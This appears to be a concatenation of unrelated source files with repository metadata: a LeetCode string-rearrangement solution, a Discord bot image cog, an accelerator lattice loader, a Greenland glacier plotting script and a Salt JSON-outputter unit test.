result.y *= max(1 / (1 - sigmoid(beta / (np.abs(10 * (ab_x - 1)) + 0.03) ** 0.5)), 1 / (1 - sigmoid(beta / (np.abs(10 * (ab_x - 0)) + 0.03) ** 0.5)))
result.x *= max(1 / (1 - sigmoid(beta / (np.abs(10 * (ab_y - 1)) + 0.03) ** 0.5)), 1 / (1 - sigmoid(beta / (np.abs(10 * (ab_y - 0)) + 0.03) ** 0.5)))
alpha = 0.1
result.add(Vec2(-1, 0), alpha * 1 / (np.abs(10 * (ab_x - 1)) + 0.01) ** 0.5)
result.add(Vec2(+1, 0), alpha * 1 / (np.abs(10 * (ab_x - 0)) + 0.01) ** 0.5)
result.add(Vec2(0, -1), alpha * 1 / (np.abs(10 * (ab_y - 1)) + 0.01) ** 0.5)
result.add(Vec2(0, +1), alpha * 1 / (np.abs(10 * (ab_y - 0)) + 0.01) ** 0.5)
if result.sqDist():
result = result.normalize()
action[0] = result.x
action[1] = result.y
self.action = action
| 43.764912
| 254
| 0.527058
|
794e3213d81b1f731ddf09e9f069f40a4f8a76b8
| 1,214
|
py
|
Python
|
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | 1
|
2019-08-28T23:15:25.000Z
|
2019-08-28T23:15:25.000Z
|
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | null | null | null |
leetcode/358.py
|
windniw/just-for-fun
|
54e5c2be145f3848811bfd127f6a89545e921570
|
[
"Apache-2.0"
] | null | null | null |
"""
link: https://leetcode-cn.com/problems/rearrange-string-k-distance-apart
problem: 重新排列字符串s,问新组成的字符串s'能否满足每个相同字符间至少间隔k-1个元素
solution: 贪心。依次决定s'的每位新字符是什么,放置时优先挑选当前可以放置的(与其之前的相同字符间隔已经有k)且剩余量最大的。
用堆与队列来实现,先按重复次数入大根堆,每次抛出堆顶元素,放置后将字符入队,当队内元素已经超过k时,证明队首元素可以重新被放置,
取出重新入堆。
"""
class Solution:
def rearrangeString(self, s: str, k: int) -> str:
class item:
def __init__(self, c, n):
self.n = n
self.c = c
def __lt__(self, t):
return self.n > t.n
def __str__(self):
return "c : {}, n: {}".format(self.c, self.n)
def __repr__(self):
return "c : {}, n: {}".format(self.c, self.n)
m, res = collections.Counter(s), ""
heap, queue = [], collections.deque()
for c in m:
heapq.heappush(heap, item(c, m[c]))
while heap:
t = heapq.heappop(heap)
res += t.c
t.n -= 1
queue.append(t)
if len(queue) >= k:
t = queue.popleft()
if t.n > 0:
heapq.heappush(heap, t)
return res if len(res) == len(s) else ""
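# Usage sketch (on LeetCode the class is invoked by the judge; tie-breaking in the heap means the
# exact output may vary among equally valid answers):
if __name__ == "__main__":
    sol = Solution()
    print(sol.rearrangeString("aabbcc", 3))  # one valid answer such as "abcabc"
    print(sol.rearrangeString("aaabc", 3))   # "" -- no arrangement keeps the three 'a's k apart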
| 28.904762
| 74
| 0.504119
|
794e325d45c8960c851170436427f2508231d1c3
| 10,700
|
py
|
Python
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 38
|
2019-05-13T19:42:31.000Z
|
2022-02-28T10:09:30.000Z
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 39
|
2019-05-26T01:55:26.000Z
|
2022-01-28T15:53:29.000Z
|
randimages/randimages.py
|
fixator10/predacogs
|
575ede3bbda867222cec911debf8fa306918be22
|
[
"MIT"
] | 50
|
2019-03-27T15:59:36.000Z
|
2022-03-12T09:33:56.000Z
|
from redbot.core import checks, commands
from redbot.core.i18n import Translator, cog_i18n
from .core import Core
from . import constants as sub
_ = Translator("Image", __file__)
@cog_i18n(_)
class RandImages(Core):
"""Send random images (animals, art ...) from different APIs."""
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def art(self, ctx: commands.Context):
"""Send art from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("art image"), emoji="\N{ARTIST PALETTE}", sub=sub.ART, details=True
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def birb(self, ctx: commands.Context):
"""Send a random birb image from alexflipnote API."""
await self._send_other_msg(
ctx,
name=_("birb"),
emoji="\N{BIRD}",
source="alexflipnote API",
img_url="https://api.alexflipnote.dev/birb",
img_arg="file",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["cats"])
async def cat(self, ctx: commands.Context):
"""Send a random cat image some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("cat"),
emoji="\N{CAT FACE}",
source="nekos.life",
img_url="https://nekos.life/api/v2/img/meow",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["catsfact"])
async def catfact(self, ctx: commands.Context):
"""Send a random cat fact with a random cat image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a cat fact with a random cat image"),
emoji="\N{CAT FACE}",
source="nekos.life",
img_url="https://nekos.life/api/v2/img/meow",
img_arg="url",
facts_url="https://some-random-api.ml/facts/cat",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def coffee(self, ctx: commands.Context):
"""Send a random coffee image from alexflipnote API."""
await self._send_other_msg(
ctx,
name=_("your coffee"),
emoji="\N{HOT BEVERAGE}",
source="alexflipnote API",
img_url="https://coffee.alexflipnote.dev/random.json",
img_arg="file",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["cuteness"])
async def cute(self, ctx: commands.Context):
"""Send a random cute images from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a cute image"), emoji="❤️", sub=sub.CUTE, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["dogs"])
async def dog(self, ctx: commands.Context):
"""Send a random dog image from random.dog API."""
await self._send_other_msg(
ctx,
name=_("dog"),
emoji="\N{DOG FACE}",
source="random.dog",
img_url="https://random.dog/woof.json",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["dogsfact"])
async def dogfact(self, ctx: commands.Context):
"""Send a random dog fact with a random dog image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a dog fact with a random dog image"),
emoji="\N{DOG FACE}",
source="random.dog",
img_url="https://random.dog/woof.json",
img_arg="url",
facts_url="https://some-random-api.ml/facts/dog",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def duck(self, ctx: commands.Context):
"""Send a random duck image from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a duck image"), emoji="\N{DUCK}", sub=sub.DUCKS, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["ferrets"])
async def ferret(self, ctx: commands.Context):
"""Send a random ferrets images from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("a ferret image"), emoji="❤️", sub=sub.FERRETS, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["foxes"])
async def fox(self, ctx: commands.Context):
"""Send a random fox image from randomfox.ca API"""
await self._send_other_msg(
ctx,
name=_("fox"),
emoji="\N{FOX FACE}",
source="randomfox.ca",
img_url="https://randomfox.ca/floof",
img_arg="image",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pandas"])
async def panda(self, ctx: commands.Context):
"""Send a random panda image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("panda"),
emoji="\N{PANDA FACE}",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/panda",
img_arg="link",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def lizard(self, ctx: commands.Context):
"""Send a random lizard image from nekos.life API"""
await self._send_other_msg(
ctx,
name=_("lizard"),
emoji="\N{LIZARD}",
source="nekos.life",
img_url="https://nekos.life/api/lizard",
img_arg="url",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["memes"])
async def meme(self, ctx: commands.Context):
"""Send a random dank meme from random subreddits."""
await self._send_reddit_msg(
ctx, name=_("meme image"), emoji="\N{OK HAND SIGN}", sub=sub.MEMES, details=False
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pandasfact"])
async def pandafact(self, ctx: commands.Context):
"""Send a random panda fact with a random panda image from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("a panda fact with a random panda image"),
emoji="\N{PANDA FACE}",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/panda",
img_arg="link",
facts_url="https://some-random-api.ml/facts/panda",
facts_arg="fact",
facts=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["pikachu"])
async def pika(self, ctx: commands.Context):
"""Send a random Pikachu image or GIF from some-random-api.ml API."""
await self._send_other_msg(
ctx,
name=_("Pikachu"),
emoji="❤️",
source="some-random-api.ml",
img_url="https://some-random-api.ml/img/pikachu",
img_arg="link",
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def shiba(self, ctx: commands.Context):
"""Send a random shiba image from shiba.online API."""
await self._send_other_msg(
ctx,
name=_("shiba"),
emoji="\N{DOG FACE}",
source="shibe.online",
img_url="http://shibe.online/api/shibes",
img_arg=0,
facts=False,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["photography"])
async def photo(self, ctx: commands.Context):
"""Send a random photography from random subreddits."""
await self._send_reddit_msg(
ctx,
name=_("a photography"),
emoji="\N{CAMERA WITH FLASH}",
sub=sub.PHOTOS,
details=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["subr"])
@commands.max_concurrency(1, commands.BucketType.user, wait=False)
async def subreddit(self, ctx: commands.Context, *, subreddit: str):
"""Send a random image from a chosen subreddit."""
if subreddit in ["friends", "mod"]:
return await ctx.send("This isn't a valid subreddit.")
await self._send_reddit_msg(
ctx,
name=_("random image"),
emoji="\N{FRAME WITH PICTURE}",
sub=[str(subreddit)],
details=True,
)
@commands.cooldown(1, 0.5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=["wallp"])
async def wallpaper(self, ctx: commands.Context):
"""Send a random wallpaper image from random subreddits."""
await self._send_reddit_msg(
ctx,
name=_("a wallpaper"),
emoji="\N{FRAME WITH PICTURE}",
sub=sub.WALLPAPERS,
details=True,
)
| 34.85342
| 93
| 0.596355
|
794e3379e6ea77ac30a4e79890fff2a6d7949c45
| 663
|
py
|
Python
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/models
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 3
|
2015-04-13T23:20:31.000Z
|
2015-04-14T01:50:31.000Z
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/models
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 17
|
2015-04-14T01:50:21.000Z
|
2016-01-28T12:50:27.000Z
|
pymodels/TS_V04_01/accelerator.py
|
lnls-fac/sirius
|
b806c3bcca6a8a8e02c1a3c9abee92f7366c44cb
|
[
"MIT"
] | 1
|
2022-02-08T13:11:35.000Z
|
2022-02-08T13:11:35.000Z
|
import numpy as _np
import lnls as _lnls
import pyaccel as _pyaccel
from . import lattice as _lattice
default_radiation_on = False
default_vchamber_on = False
def create_accelerator(optics_mode=_lattice.default_optics_mode):
latt, twiss_at_start = _lattice.create_lattice(optics_mode=optics_mode)
accelerator = _pyaccel.accelerator.Accelerator(
        lattice=latt,
energy=_lattice.energy,
radiation_on=default_radiation_on,
vchamber_on=default_vchamber_on
)
return accelerator, twiss_at_start
accelerator_data = dict()
accelerator_data['lattice_version'] = 'TS_V04_01'
accelerator_data['pressure_profile'] = None
| 25.5
| 75
| 0.775264
|
794e34f6cd26f82dd76c136ef9fae57635c9201b
| 14,999
|
py
|
Python
|
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
Visualization/Gld-case_study_plotting.py
|
achau1/plastic-networks
|
6845a7d83ab9d6901dfc921e5fe7ffda965758da
|
[
"MIT"
] | null | null | null |
## Plotting individual glacier results for case studies
## 24 Apr 2019 EHU
import numpy as np
import matplotlib.pyplot as plt
import csv
import shapefile
#import collections
import glob
#from matplotlib.colors import LogNorm
from matplotlib import cm
import matplotlib.patches as mpatches
from shapely.geometry import *
from scipy import interpolate
from scipy.ndimage import gaussian_filter
## Special import for SERMeQ modules
import sys
sys.path.insert(0, 'Documents/GitHub/plastic-networks')
from SERMeQ.plastic_utilities_v2 import *
from SERMeQ.GL_model_tools import *
from SERMeQ.flowline_class_hierarchy import *
### Topography needed to remove floating points from saved coords
###
print 'Reading in surface topography'
gl_bed_path ='Documents/1. Research/2. Flowline networks/Model/Data/BedMachine-Greenland/BedMachineGreenland-2017-09-20.nc'
fh = Dataset(gl_bed_path, mode='r')
xx = fh.variables['x'][:].copy() #x-coord (polar stereo (70, 45))
yy = fh.variables['y'][:].copy() #y-coord
s_raw = fh.variables['surface'][:].copy() #surface elevation
h_raw=fh.variables['thickness'][:].copy() # Gridded thickness
b_raw = fh.variables['bed'][:].copy() # bed topo
thick_mask = fh.variables['mask'][:].copy()
ss = np.ma.masked_where(thick_mask !=2, s_raw)#mask values: 0=ocean, 1=ice-free land, 2=grounded ice, 3=floating ice, 4=non-Greenland land
hh = np.ma.masked_where(thick_mask !=2, h_raw)
#bb = np.ma.masked_where(thick_mask !=2, b_raw)
bb = b_raw #don't mask, to allow bed sampling from modern bathymetry (was subglacial in ~2006)
## Down-sampling
X = xx[::2]
Y = yy[::2]
S = ss[::2, ::2]
H = hh[::2, ::2]
B = bb[::2, ::2]
M = thick_mask[::2,::2]
## Not down-sampling
#X = xx
#Y = yy
#S = ss
fh.close()
#Smoothing bed and surface
unsmoothB = B
smoothB = gaussian_filter(B, 2)
smoothS = gaussian_filter(S, 2)
#B_processed = np.ma.masked_where(thick_mask !=2, smoothB)
#Replacing interpolated surface with bed+thickness
S_new = np.add(B, H)
S_interp = interpolate.RectBivariateSpline(X, Y[::-1], smoothS.T[::, ::-1])
H_interp = interpolate.RectBivariateSpline(X, Y[::-1], H.T[::, ::-1])
B_interp = interpolate.RectBivariateSpline(X, Y[::-1], smoothB.T[::, ::-1])
###--------------------------------------
#### GLACIERS TO PLOT
###--------------------------------------
## Which glaciers are available
glacier_ids = range(1,195) #MEaSUREs glacier IDs to process.
not_present = (93, 94, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 169) #glacier IDs missing from set
## which ones get special treatment
added_jan19 = (139, 140, 141, 142, 143, 159, 161, 172, 173, 177)
seaward_projected = (61, 64, 82, 83, 99, 130, 132, 139, 140, 141, 156, 157, 158, 161, 167, 170, 178, 179, 180, 184)
special_treatment = np.concatenate((added_jan19, seaward_projected))
errors = (5, 18, 19, 29, 71, 92, 95, 97, 101, 107, 108, 120, 134) #glacier IDs that crashed in hindcasting 12 Mar 2019
rmv = np.concatenate((not_present, errors))
for n in rmv:
try:
glacier_ids.remove(n)
except ValueError:
pass
#glaciers_to_plot=np.copy(glacier_ids).tolist()
#for m in special_treatment:
# try:
# glaciers_to_plot.remove(m)
# except ValueError:
# pass
glaciers_to_plot = [g for g in glacier_ids if g in (3, 105, 137, 175)]
testyears = arange(0, 9, step=0.25)#array of the years tested, with year "0" reflecting initial nominal date of MEaSUREs read-in (generally 2006)
scenarios = ('persistence',)
#datemarker = '2019-02-08' #markers on filename to indicate date run
tempmarker = 'min10Cice' #and temperature of ice
timestepmarker = '8a_dt025a' #and total time and timestep
full_output_dicts = {}
for s in scenarios:
scenario_output = {'Testyears': testyears}
for gid in glaciers_to_plot:
fn = glob.glob('Documents/GitHub/Data_unsynced/Hindcasted_networks/GID{}-*-{}-{}-{}.pickle'.format(gid, s, tempmarker, timestepmarker))[0] #using glob * to select files of multiple run dates
lightload(fn, glacier_name = 'GID{}'.format(gid), output_dictionary = scenario_output)
#for i, gid in enumerate(glaciers_to_plot):
# fn = 'GID{}-{}-{}-{}-{}.pickle'.format(gid, datemarker, s, tempmarker, timestepmarker)
# lightload(fn, glacier_name = 'GID{}'.format(gid), output_dictionary = scenario_output)
full_output_dicts[s] = scenario_output #add output from this scenario to the dictionary of all output, with scenario name as key
perscenario_fluxes = []
perscenario_SLE = []
for s in full_output_dicts.keys():
print 'Scenario {}'.format(s)
out = full_output_dicts[s]
pernetwork_cumul_fx = []
pernetwork_cumul_sle = []
for j, gid in enumerate(glaciers_to_plot):
branch_fx = [np.nan_to_num(out['GID{}'.format(gid)][k]['Terminus_flux']) for k in range(len(out['GID{}'.format(gid)]))]
total_fx = sum(branch_fx, axis=0)
total_sle = (1E-12)*np.array(total_fx)/(361.8) #Gt ice/mm SLE conversion
cumul_fx = np.cumsum(total_fx)
cumul_sle = np.cumsum(total_sle)
pernetwork_cumul_fx.append(cumul_fx)
pernetwork_cumul_sle.append(cumul_sle)
scenario_flux = np.cumsum(pernetwork_cumul_fx, axis=0)
perscenario_fluxes.append(scenario_flux[-1])
scenario_sle = np.cumsum(pernetwork_cumul_sle, axis=0)
print max(scenario_sle[-1])
print(scenario_sle[-1][-1])
perscenario_SLE.append(scenario_sle[-1])
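## Worked example of the flux -> sea-level-equivalent conversion above. The 1E-12 factor suggests
## Terminus_flux is accumulated in kg (1 Gt = 1E12 kg), and ~361.8 Gt of ice corresponds to about
## 1 mm of global mean sea-level rise, so for a hypothetical cumulative flux:
example_flux_kg = 3.618E14
example_sle_mm = (1E-12)*example_flux_kg/361.8 #= 1.0 mm SLE
print 'Example: {} kg of ice ~ {} mm sea level equivalent'.format(example_flux_kg, example_sle_mm)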
gl_termpos_fldr = 'Documents/GitHub/Data_unsynced/MEaSUREs-termini'
basefiles = ['/termini_0607_v01_2', '/termini_0708_v01_2', '/termini_0809_v01_2', '/termini_1213_v01_2', '/termini_1415_v01_2', '/termini_1516_v01_2']
obs_years = [2006, 2007, 2008, 2012, 2014, 2015] #compare with term of hindcast, 2006-2014
termini = {}
for i,b in enumerate(basefiles):
yr = obs_years[i]
fn = gl_termpos_fldr+b
termini[yr] = read_termini(fn, yr) #creating dictionary for each year
print len(termini[yr])
nw_base_fpath = 'Documents/1. Research/2. Flowline networks/Auto_selected-networks/Gld-autonetwork-GID'
projected_termini = {gid: [] for gid in glaciers_to_plot}
seaward_coords_fpath = 'Documents/GitHub/Data_unsynced/Auto_selected-networks/Seaward_coords/Gld-advnetwork-GID'
termpos_corrections = {gid: 0 for gid in glacier_ids}
for gid in glaciers_to_plot:
print 'Reading in glacier ID: '+str(gid)
#if gid in added_jan19:
# filename = nw_base_fpath+str(gid)+'-date_2019-01-10.csv'
filename = glob.glob(nw_base_fpath+'{}-date_*.csv'.format(gid))[0] #using glob * to select files of different run dates
coords_list = Flowline_CSV(filename, has_width=True, flip_order=False)
if gid in seaward_projected:
seaward_fn = seaward_coords_fpath+'{}-fwd_2000_m.csv'.format(gid)
seaward_coords = Flowline_CSV(seaward_fn, has_width=True, flip_order=True)[0]
branch_0 = Branch(coords=np.concatenate((seaward_coords, coords_list[0])), index=0, order=0) #saving extended central branch as main
termpos_correction = 10*max(ArcArray(seaward_coords)) #how much glacier length has been added to initial line, i.e. how much terminus shifted in coordinate system, in km
print termpos_correction
else:
branch_0 = Branch(coords=coords_list[0], index=0, order=0) #saving central branch as main
termpos_correction = 0
termpos_corrections[gid] = termpos_correction
branch_list = [branch_0]
nw = PlasticNetwork(name='GID'+str(gid), init_type='Branch', branches=branch_list, main_terminus=branch_0.coords[0])
nw.make_full_lines()
if gid not in seaward_projected: #remove floating, but not from lines that have been artificially extended
print 'Removing floating points from glacier ID: '+str(gid)
nw.process_full_lines(B_interp, S_interp, H_interp)
nw.remove_floating()
mainline = LineString(nw.flowlines[0].coords)
for yr in obs_years:
try:
termpts = termini[yr][gid] #get terminus points for each year
t = projected_term_obs(termpts, mainline) #project onto main flowline
r = retterm(termpts, mainline) #find most retreated point
a = advterm(termpts, mainline) #find most advanced point
print 'GID {}, t={}, r={}, a={}'.format(gid, t, r, a)
projected_termini[gid].append((-1*termpos_correction)+np.asarray((a, t, r))) #add these to dictionary of projected termini per glacier
except KeyError:
print 'No terminus found in year {} for GID {}.'.format(yr, gid)
projected_termini[gid].append((0, np.nan, 0))
###--------------------------------------
#### PLOTTING
###--------------------------------------
## Settings for plots
#labels = [str(g[1]) for g in gids_by_name if g[0] in glaciers_to_plot] #set what the glaciers will be called in plotting. Default is simply their MEaSUREs ID
labels = [str(g) for g in glaciers_to_plot]
markers = ['o', '.', ',', '^', 'd', '*']
styles = ['-', ':', '-.', '-', '-', '-']
cmap = cm.get_cmap('winter')
scenario_colors = cm.get_cmap('Blues')([0.1, 0.3, 0.5, 0.7, 0.9])
#colors = cmap([0.1, 0.2, 0.3, 0.5, 0.7, 0.9])
colors = cmap(linspace(0.1, 0.9, num=len(glaciers_to_plot)))
alt_colors = cm.get_cmap('Greys')([0.2, 0.3, 0.5, 0.7, 0.9])
plot_years = 2006+np.array(testyears)
#
#####terminus
#plt.figure()
#for j, gid in enumerate(glaciers_to_plot):
# print gid
# term_positions = full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::]
# ms_selection = mod(j, len(styles))
# plt.plot(testyears, -0.001*np.array(term_positions), linewidth=2, color='Gainsboro', linestyle=styles[ms_selection], label=labels[j])
# #plt.plot(testyears[::4], -0.001*np.array(full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::])[::4], linewidth=0, marker=markers[ms_selection], ms=10, color=colors[j])
#plt.legend(loc='lower left')
#plt.axes().set_xlabel('Year of simulation', size=20)
#plt.axes().set_ylabel('Terminus change [km]', size=20)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_ylim(-100, 1)
##plt.axes().set_yticks([-75, -50, -25, 0])
#plt.title('Terminus retreat of {} Greenland outlet glaciers 2006-2014 ERA-I, Tice=-10 C'.format(len(glaciers_to_plot)), fontsize=20)
#plt.show()
####SINGLE NETWORK - termini vs obs
for j, gid in enumerate(glaciers_to_plot):
sim_termini = full_output_dicts['persistence']['GID{}'.format(gid)][0]['Termini'][1::]
obs_termini = np.asarray(projected_termini[gid]) #will be of shape (len(obs_years), 3) with an entry (lower, centroid, upper) for each year
obs_term_centr = obs_termini[:,1]
e = np.asarray([(min(ot[0]-ot[1], ot[0]), ot[1]-ot[2]) for ot in obs_termini]).T #error lower (more advanced), upper (less advanced)
plt.figure('Main line terminus change, GID{}'.format(gid))
plt.plot(plot_years, -0.001*np.array(sim_termini), linewidth=2, color='k', linestyle='-', label='Modelled')
plt.errorbar(obs_years, -1*obs_term_centr, yerr = e, fmt='D')
plt.axes().tick_params(axis='both', length=5, width=2, labelsize=30)
plt.axes().set_xlim(2006, 2014.5)
plt.axes().set_xticks([2006, 2008, 2010, 2012, 2014])
plt.axes().set_ylim(-20, 2)
plt.axes().set_yticks([-20, -15, -10, -5, 0])
if gid==175:
plt.axes().set_xticklabels(['2006', '2008', '2010', '2012', '2014'])
plt.axes().set_xlabel('Year', size=35)
else:
plt.axes().set_xticklabels([])
if gid==3:
plt.axes().set_yticklabels(['-20', '', '-10', '', '0'])
plt.axes().set_ylabel('Terminus change [km]', size=35)
else:
plt.axes().set_yticklabels([])
plt.axes().set_aspect(0.3)
plt.show()
##
#####SINGLE NETWORK - splitting termini
#single_network_output = full_output_dicts['persistence']['GID10']
#plt.figure('Single network terminus change')
#for k in range(len(single_network_output)): #for each branch j
# #colork = alt_colors[mod(k, len(colors))]
# branch_termini = single_network_output[k]['Termini'] #for some reason enumerate doesn't work with loaded-in output, so we're stuck with this
# #markerk = (k+2, mod(k+1, 3), 0)
# plt.plot(testyears, -0.001*np.array(branch_termini[0:-1:]), linewidth=4, label='Branch {}'.format(k))
# #plt.plot(testyears[::10], -0.001*np.array(branch_termini[0:-1:])[::10], linewidth=0, color=colork, marker=markerk, ms=10)
#plt.legend(loc='lower left')
#plt.axes().set_xlabel('Year of simulation', size=30)
#plt.axes().set_ylabel('Terminus change [km]', size=30)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_ylim(-50, 1)
##plt.axes().set_yticks([-50, -25, 0])
#plt.show()
#
#####Flux
#for j, gid in enumerate(glaciers_to_plot):
# plt.figure('GID{}'.format(gid))
# ms_selection = mod(gid, len(styles))
# plt.plot(testyears, 1E-12*np.array(pernetwork_cumul_fx[j]), linewidth=4, label=str(gid), color=colors[ms_selection], linestyle = styles[ms_selection])
# plt.plot(testyears[::20], 1E-12*np.array(pernetwork_cumul_fx[j][::20]), linewidth=0, ms=10, marker=markers[ms_selection])
# plt.fill_between(testyears, y1=1E-12*np.array(pernetwork_cumul_fx[j]), y2=0, alpha=0.5)
# plt.axes().set_xlabel('Year of simulation', size=20)
# plt.axes().set_ylabel('Cumulative ice flux [Gt]', size=20)
# plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
# plt.axes().set_xlim(0,50)
# plt.axes().set_xticks([0,10,20, 30, 40, 50])
# #plt.axes().set_ylim(0, 401)
# #plt.axes().set_yticks([0, 50, 100, 150, 200, 250, 300, 350, 400])
# plt.show()
##
#######Sea level equivalent
#plt.figure(figsize=(12,8))
#for j, gid in enumerate(glaciers_to_plot):
# #if gid!=10:
# ms_selection = mod(gid, len(styles))
# plt.plot(testyears[::], scenario_sle[j], linewidth=4, color=colors[ms_selection], label=gid)
# plt.plot(testyears[::5], scenario_sle[j][::5], linewidth=0, marker=markers[ms_selection], ms=10, color=colors[ms_selection])
# if j==0:
# plt.fill_between(testyears[::], y1=scenario_sle[j], y2=0, color=colors[ms_selection], alpha=0.7)
# else:
# plt.fill_between(testyears[::], y1=scenario_sle[j], y2=scenario_sle[j-1], color=colors[ms_selection], alpha=0.7)
##plt.plot([0, 20, 40, 60], [0, 14, 28, 42], color='k', linewidth=1, ls='-', alpha=0.8) #GRACE linear trend
##rect = mpatches.Rectangle((98,8.5), width=2, height=4.6, color='k', alpha=0.7) # Nick et al total projection for 2100, A1B
##rect2 = mpatches.Rectangle((98,11.3), width=2, height=6.2, color='k', alpha=0.7) # Nick et al total projection for 2100, RCP8.5
##plt.axes().add_patch(rect)
##plt.axes().add_patch(rect2)
#plt.legend(loc='upper left')
#plt.axes().set_xlabel('Year of simulation', size=20)
#plt.axes().set_ylabel('Cumulative sea level contribution [mm]', size=20)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_xlim(0, 100)
##plt.axes().set_xticks([0, 25, 50, 75, 100])
##plt.axes().set_ylim(0, 12)
##plt.axes().set_yticks([0, 2, 4, 6, 8, 10, 12])
#plt.show()
| 47.767516
| 198
| 0.677645
|
794e358db9dba650df024a9239322103f0972e54
| 2,068
|
py
|
Python
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 2
|
2015-09-21T14:13:30.000Z
|
2016-02-12T11:33:46.000Z
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 1
|
2019-09-06T13:57:28.000Z
|
2019-09-06T13:57:28.000Z
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 2
|
2017-01-05T16:14:59.000Z
|
2019-01-31T23:15:25.000Z
|
# -*- coding: utf-8 -*-
'''
unittests for json outputter
'''
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
# Import Salt Libs
from salt.output import json_out as json
class JsonTestCase(TestCase):
'''
Test cases for salt.output.json_out
'''
def setUp(self):
json.__opts__ = {}
self.data = {'test': 'two', 'example': 'one'}
def test_default_output(self):
ret = json.output(self.data)
expect = '{\n "test": "two", \n "example": "one"\n}'
self.assertEqual(expect, ret)
def test_pretty_output(self):
json.__opts__['output_indent'] = 'pretty'
ret = json.output(self.data)
expect = '{\n "example": "one", \n "test": "two"\n}'
self.assertEqual(expect, ret)
def test_indent_output(self):
json.__opts__['output_indent'] = 2
expect = '{\n "test": "two", \n "example": "one"\n}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_negative_zero_output(self):
json.__opts__['output_indent'] = 0
